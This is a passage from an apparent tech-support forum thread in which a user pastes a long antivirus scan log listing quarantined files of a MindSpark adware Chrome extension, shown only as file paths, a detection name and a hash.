    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\spent.css, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\bg.html, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\buildVars, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\buildVars.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\companionSW.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\config.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\contentScript.css, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\contentScript.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\debug.html, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\debug.jade, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\extension_toolbar_api.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\initWidgetWindow.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\newTabContentScript.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\options.html, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\spent.html, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\spent.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\spent2.css, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\spent2.html, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\spentJ.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\spentK.html, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\spentK.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\startup.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\stub.html, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\stubby.html, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\superFrame.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\toolbar.html, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\toolbar.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\toolbarUI.css, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\toolbarUI.html, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\toolbarUI.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\url.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\webtooltab.cs.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\adapter\adapterUtil.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\adapter\widget-adapter.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\abstractbutton\background\abstractButton.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\alert\background\alertButton.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\embedhtml\background\embedHtmlWidget.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\embedhtml\html\embedHtmlTemplate.html, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\embedhtml\html\innerEmbedHtmlTemplate.html, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\embedhtml\js\embedHtmlUI.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\embedscript\background\embedScriptWidget.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\embedscript\html\embedScriptTemplate.html, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\embedscript\html\innerEmbedScriptTemplate.html, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\embedscript\js\embedScriptUI.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\flare\background\FlareWidget.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\flare\icons\Icon_Flare_blue.png, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\flare\icons\Icon_Flare_pink.png, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\flare\icons\Thumbs.db, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\generic\background\GenericWidget.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\link\background\linkButton.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\menu\README.txt, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\menu\background\menuButton.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\menu\css\menuframe.css, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\menu\html\menuframe.html, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\menu\images\right_arrow.png, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\menu\images\right_arrow_white.png, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\menu\js\jquery-1.7.1.min.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\menu\js\menuframe.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\menu\js\query-string.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\menu\js\underscore-1.3.1.min.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\rss\background\RssWidget.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\thirdparty\background\thirdPartyWidget.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\uninstall\background\uninstallButton.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\components\weather\background\weatherButton.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
     
  12. blackclaw96

    blackclaw96 TS Rookie Topic Starter

    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\js\bs.30.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\js\common.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\js\dynamic.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\js\enableDetect.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\js\eventListening.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\js\global.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\js\jquery-1.7.1.min.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\js\list-interaction.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\js\messageEventListener.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\js\navRedirector.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\js\paramReplacer.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\js\PartnerId.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\js\set.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\js\underscore-1.3.1.min.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\js\underscore-1.5.2.min.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\js\unifiedLogging.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\widget-api\widget-context-1.0.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\widget-api\widgets\common\common.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\widget-api\widgets\common\eventListening.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\widget-api\widgets\common\jquery-1.7.1.min.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\widget-api\widgets\common\list-interaction.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\widget-api\widgets\common\set.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\widget-api\widgets\common\underscore-1.3.1.min.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\widget-api\widgets\radio\radio-widget.html, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\widget-api\widgets\radio\css\radio-widget.css, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\widget-api\widgets\radio\js\radio-custom.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\widget-api\widgets\radio\js\radio-parser.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\widget-api\widgets\radio\js\radio-widget-ui.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\widget-api\widgets\radio\js\radio-widget.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\widget-api\widgets\rss\rssWidget.html, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\widget-api\widgets\rss\js\rss-widget-custom.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\widget-api\widgets\rss\js\rss-widget-parse.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\widget-api\widgets\rss\js\rss-widget.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\widget-api\widgets\test\invalid.json, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\widget-api\widgets\test\jquery.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\widget-api\widgets\test\qunit.css, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\widget-api\widgets\test\qunit.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\widget-api\widgets\test\resource.json, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\widget-api\widgets\test\resource.xml, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\widget-api\widgets\test\testWidget.html, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\widget-api\widgets\test\testWidget.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\widget-api\widgets\topapps\widget.html, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\widget-api\widgets\topapps\css\widget.css, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\widget-api\widgets\topapps\js\nanigans-topapps-feed.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\widget-api\widgets\topapps\js\topapps-config.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\widget-api\widgets\topapps\js\widget.js, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
    PUP.Optional.MindSpark, C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk\12.20.8.64773_0\common\widget-api\widgets\weather\weatherButton.html, Quarantined, [cdde81063366e5512c3bbb8311f4d729],
